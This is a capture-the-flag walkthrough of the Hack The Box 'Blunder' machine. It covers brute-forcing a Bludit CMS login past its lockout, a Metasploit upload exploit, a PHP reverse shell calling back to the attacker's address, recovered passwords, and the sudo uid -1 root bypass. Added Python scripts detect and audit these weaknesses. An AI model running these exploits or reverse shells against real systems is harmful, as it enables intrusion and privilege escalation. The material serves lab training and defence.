HTB Blunder done
Blunder
Notes
OS:
Linux
Technology: Bludit CMS (web roots /var/www/bludit-3.9.2 and /var/www/bludit-3.10.0a) on Apache httpd 2.4.41 / PHP
IP Address:
10.129.214.172
10.129.95.225
Open ports:
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and passwords:
Bludit admin login (recovered by brute-forcing the website login with a cewl wordlist)
U: fergus
P: RolandDeschain
---
From /var/www/bludit-3.10.0a/bl-content/databases/users.php
L: hugo
P: Password120
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.214.172_nmap 10.129.214.172 ; cat 10.129.214.172_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 13:43 CET
Nmap scan report for 10.129.214.172
Host is up (0.087s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
Ffuf
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ ffuf -u http://10.129.214.172/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.214.172_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git | grep -v "2395"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.214.172/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.214.172_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 7584, Words: 794, Lines: 171, Duration: 193ms]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22, Duration: 112ms]
README.md [Status: 200, Size: 2893, Words: 251, Lines: 71, Duration: 40ms]
about [Status: 200, Size: 3299, Words: 225, Lines: 106, Duration: 66ms]
[INFO] Adding a new job to the queue: http://10.129.214.172/admin/FUZZ
admin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 128ms]
cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 71ms]
install.php [Status: 200, Size: 30, Words: 5, Lines: 1, Duration: 102ms]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 66ms]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 59ms]
todo.txt [Status: 200, Size: 118, Words: 20, Lines: 5, Duration: 44ms]
usb [Status: 200, Size: 3978, Words: 304, Lines: 111, Duration: 51ms]
[INFO] Starting queued job on target: http://10.129.214.172/admin/FUZZ
ajax [Status: 401, Size: 0, Words: 1, Lines: 1, Duration: 77ms]
:: Progress: [163752/163752] :: Job [2/2] :: 190 req/sec :: Duration: [0:12:54] :: Errors: 0 ::
Read website: http://10.129.214.172/todo.txt
Found username: fergus
---
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
Brute-force login (CVE-2019-17240, Bludit login lockout bypass)
Download exploit:
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ git clone https://github.com/spyx/cve-2019-17240.git
Cloning into 'cve-2019-17240'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 6 (delta 0), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), 3.38 MiB | 4.07 MiB/s, done.
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cd cve-2019-17240
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ls
cve-2019-17240 cve-2019-17240.go pass.txt README.md
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240
2025/03/27 14:23:20 invalid argument
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240 --help
Usage of ./cve-2019-17240:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Create a custom wordlist with cewl
rockyou.txt is not a good choice here; a wordlist built from the site's own content works better
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ cewl http://10.129.214.172 > wordlist.txt
Run exploit
U: fergus
P: RolandDeschain
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240 -l http://10.129.95.225/admin/login.php -u fergus -p wordlist.txt
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 70
Total requests sent: 80
Total requests sent: 90
Total requests sent: 100
Total requests sent: 110
Total requests sent: 120
Total requests sent: 130
Total requests sent: 140
Total requests sent: 150
Total requests sent: 160
Total requests sent: 170
Total requests sent: 180
Total requests sent: 190
Total requests sent: 200
Total requests sent: 210
Total requests sent: 220
Total requests sent: 230
Total requests sent: 240
Total requests sent: 250
Total requests sent: 260
Total requests sent: 264
==========Password Cracked=============Password: RolandDeschain
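The run above sends 264 login attempts without ever being locked out, because the lockout in Bludit 3.9.2 is keyed on the client-supplied X-Forwarded-For header rather than the real peer address. The detection below is an added example for these notes (not part of the writeup or of the cve-2019-17240 tool): it reads Apache "combined" access-log lines, keys on the first field (the TCP peer address, which a spoofed header cannot change), and flags any source that POSTs to the login page more than a threshold number of times inside a sliding window. The log lines are constructed, not captured from the box; the login path /admin/login.php and the attacker address 10.10.14.92 are taken from the notes.

```python
"""Detect Bludit admin-login brute forcing in Apache access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_login_bursts(lines, login_path="/admin/login.php", threshold=20,
                      window=timedelta(minutes=5)):
    """Return {peer_ip: total_login_posts} for every peer address that POSTed to
    login_path more than `threshold` times within any `window`.

    Keying on the peer address (first log field) is deliberate: Bludit 3.9.2's
    own lockout trusted X-Forwarded-For, so an attacker rotating that header
    never tripped it, while the web server's log still shows one source.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def make_sample_log():
    """Constructed sample: 264 login POSTs from one client in under two minutes
    (matching the request count above) plus ordinary traffic from another client."""
    base = datetime.strptime("27/Mar/2025:14:23:20 +0100", TS_FMT)
    lines = []
    for i in range(264):
        ts = (base + timedelta(seconds=i // 3)).strftime(TS_FMT)
        lines.append(f'10.10.14.92 - - [{ts}] "POST /admin/login.php HTTP/1.1" 200 7584 "-" "Go-http-client/1.1"')
    ts = base.strftime(TS_FMT)
    lines.append(f'10.10.14.50 - - [{ts}] "GET /about HTTP/1.1" 200 3299 "-" "Mozilla/5.0"')
    lines.append(f'10.10.14.50 - - [{ts}] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, n in find_login_bursts(make_sample_log()).items():
        print(f"{ip}: {n} login POSTs within a 5-minute window")
```

Run it against a real access.log by feeding `open("/var/log/apache2/access.log")` to find_login_bursts; the threshold of 20 POSTs per five minutes is a starting point, not a tuned value.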
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ msfconsole -q
msf6 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
msf6 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS RolandDeschain yes The password for Bludit
BLUDITUSER fergus yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.95.225 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.92 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
View the full module info with the info, or info -d command.
Run revshell (netcat listener on port 80; the uploaded revshell.php connects back as www-data)
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.95.225] 50872
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:07:35 up 51 min, 1 user, load average: 0.06, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
shaun :0 :0 13:15 ?xdm? 42.18s 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
---
msf6 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.92:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading SzoDUCOVKp.png...
[*] Uploading .htaccess...
[*] Executing SzoDUCOVKp.png...
[*] Sending stage (40004 bytes) to 10.129.95.225
[+] Deleted .htaccess
[*] Meterpreter session 2 opened (10.10.14.92:4444 -> 10.129.95.225:40864) at 2025-03-28 15:06:39 +0100
meterpreter > pwd
/var/www/bludit-3.9.2/bl-content/tmp
meterpreter > cd ../../
meterpreter > upload revshell.php
[*] Uploading : /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
[*] Uploaded -1.00 B of 5.36 KiB (-0.02%): /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
[*] Completed : /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
meterpreter >
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cp php-reverse-shell.php revshell.php
---
// Configuration header of pentestmonkey's php-reverse-shell.php (rest of the file unchanged); $ip and $port point at the netcat listener above
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.92'; // CHANGE THIS
$port = 80; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Find creds in file: /var/www/bludit-3.10.0a/bl-content/databases/users.php
L: hugo
P: Password120
The password hash is plain SHA1 (40 hex chars, no salt stored in the entry): "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"
---
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
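The reason the hugo password falls out so easily is that the entry stores an unsalted SHA1 digest, which any candidate list can be checked against at full speed. The script below is an added example for these notes (not Bludit's code): it strips the PHP guard line from users.php, parses the JSON body, and reports every account whose hash equals the SHA1 of a candidate. The users.php text is copied from the listing above (trimmed to the relevant fields); the candidate list is constructed and stands in for a wordlist plus cewl output. An entry that also stored a salt would need the salt folded into the digest before comparing, and a slow salted hash (bcrypt, PBKDF2) is what should be there instead.

```python
"""Audit a Bludit users.php for weak, unsalted SHA1 password hashes (added example)."""
import hashlib
import json

# Copied from the users.php shown above, trimmed to the relevant fields.
USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"registered": "2019-11-27 07:40:55"}
}
"""


def load_users(text):
    """Drop the leading '<?php ... ?>' guard line and parse the JSON body."""
    body = text.split("?>", 1)[1]
    return json.loads(body)


def sha1_hex(s):
    return hashlib.sha1(s.encode()).hexdigest()


def looks_like_sha1(h):
    """40 lowercase hex characters; with no salt next to it this is plain SHA1."""
    return len(h) == 40 and all(c in "0123456789abcdef" for c in h)


def weak_passwords(users, candidates):
    """Map username -> candidate for every entry whose hash is the SHA1 of a
    candidate. One digest per candidate is computed and reused for all users,
    which is exactly why an unsalted fast hash offers so little protection."""
    table = {sha1_hex(c): c for c in candidates}
    found = {}
    for name, entry in users.items():
        h = entry.get("password", "")
        if looks_like_sha1(h) and h in table:
            found[name] = table[h]
    return found


# Constructed candidate list; a real audit would use a wordlist plus cewl output.
CANDIDATES = ["password", "Bludit", "fergus", "Password120", "RolandDeschain"]


if __name__ == "__main__":
    for name, pw in weak_passwords(load_users(USERS_PHP), CANDIDATES).items():
        print(f"{name}: weak password {pw!r}")
```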
Read flag: user.txt
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@blunder:/$ export TERM=xterm
export TERM=xterm
www-data@blunder:/$ ^Z
zsh: suspended netcat -lvnp 80
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ stty raw -echo; fg
[1] + continued netcat -lvnp 80
stty rows 38 columns 116
www-data@blunder:/$ su hugo
Password:
hugo@blunder:/$ cd ~
hugo@blunder:~$ ls -a
. .bash_history .bashrc .config Documents .gnupg .mozilla Pictures Public Templates Videos
.. .bash_logout .cache Desktop Downloads .local Music .profile .ssh user.txt
hugo@blunder:~$
hugo@blunder:~$ cat user.txt
1863012b573ab12cab20e49e5189679e
hugo@blunder:~$
Privilege Escalation
sudo -l
hugo@blunder:~$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$
Find exploit: sudo 1.8.27 - Security Bypass
The runas rule (ALL, !root) is meant to allow any user except root, but sudo before 1.8.28 maps the user id -1 (4294967295) to uid 0, so the exclusion can be bypassed with:
sudo -u#-1 /bin/bash
---
hugo@blunder:~$ sudo -V
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$
hugo@blunder:~$
hugo@blunder:~$ sudo -u#-1 /bin/bash
root@blunder:/home/hugo#
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
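The fix here is an upgraded sudo plus a rule that names the intended runas users instead of ALL with a '!root' exclusion. The audit below is an added example for these notes (not part of the box or of sudo): it takes the text of `sudo -V` and `sudo -l`, extracts the version and every runas list that contains '!root', and reports a finding when the version is older than 1.8.28 (the release that closed the uid -1 bypass) or, on a fixed sudo, a weaker note that a positive list is still preferable. The sudo -V and sudo -l samples are copied from the output above; the extra (www-data) rule is constructed to show a rule that is not flagged.

```python
"""Flag sudoers runas rules of the form (ALL, !root) on sudo older than 1.8.28 (added example)."""
import re

FIXED_VERSION = (1, 8, 28)  # first sudo release where -u#-1 no longer maps to root


def parse_sudo_version(sudo_v_output):
    """'Sudo version 1.8.25p1' -> (1, 8, 25); the 'p' patch level is ignored."""
    m = re.search(r"^Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output, re.M)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())


# A rule line from `sudo -l`: "(runas list) [TAG:] command"
RUNAS_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.+?)\s*$")


def negated_root_rules(sudo_l_output):
    """Return (runas, command) for every rule whose runas list excludes root
    instead of naming the permitted users, e.g. '(ALL, !root) /bin/bash'."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RUNAS_RE.match(line)
        if not m:
            continue
        runas = m.group("runas")
        if "!root" in runas.replace(" ", "").split(","):
            rules.append((runas, m.group("cmd")))
    return rules


def audit(sudo_v_output, sudo_l_output):
    """Return a list of findings; an empty list means nothing to report."""
    version = parse_sudo_version(sudo_v_output)
    vstr = ".".join(map(str, version))
    findings = []
    for runas, cmd in negated_root_rules(sudo_l_output):
        if version < FIXED_VERSION:
            findings.append(
                f"({runas}) {cmd}: sudo {vstr} < 1.8.28, a '!root' exclusion is bypassable "
                "via uid -1; upgrade sudo and list the intended runas users explicitly"
            )
        else:
            findings.append(
                f"({runas}) {cmd}: exclusion is honoured on sudo {vstr}, but a positive "
                "runas list is still safer than ALL with '!root'"
            )
    return findings


# Copied from the `sudo -V` and `sudo -l` output above; the (www-data) rule is constructed.
SUDO_V = """Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
"""

SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (www-data) NOPASSWD: /usr/bin/systemctl restart apache2
"""


if __name__ == "__main__":
    for finding in audit(SUDO_V, SUDO_L):
        print(finding)
```

On a live host, feed it `subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout` and the same for `sudo -l`; the parser only looks at rule lines that start with a parenthesised runas list, so Defaults entries are ignored.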
Read flag: root.txt
root@blunder:/home/hugo# cd /root
root@blunder:/root# ls
log reset.sh root.txt snap
root@blunder:/root#
root@blunder:/root# cat root.txt
29f8a09dd9a70ef836832a8025e55b5b
References
[sudo 1.8.27 - Security Bypass](https://www.exploit-db.com/exploits/47502)
Lessons Learned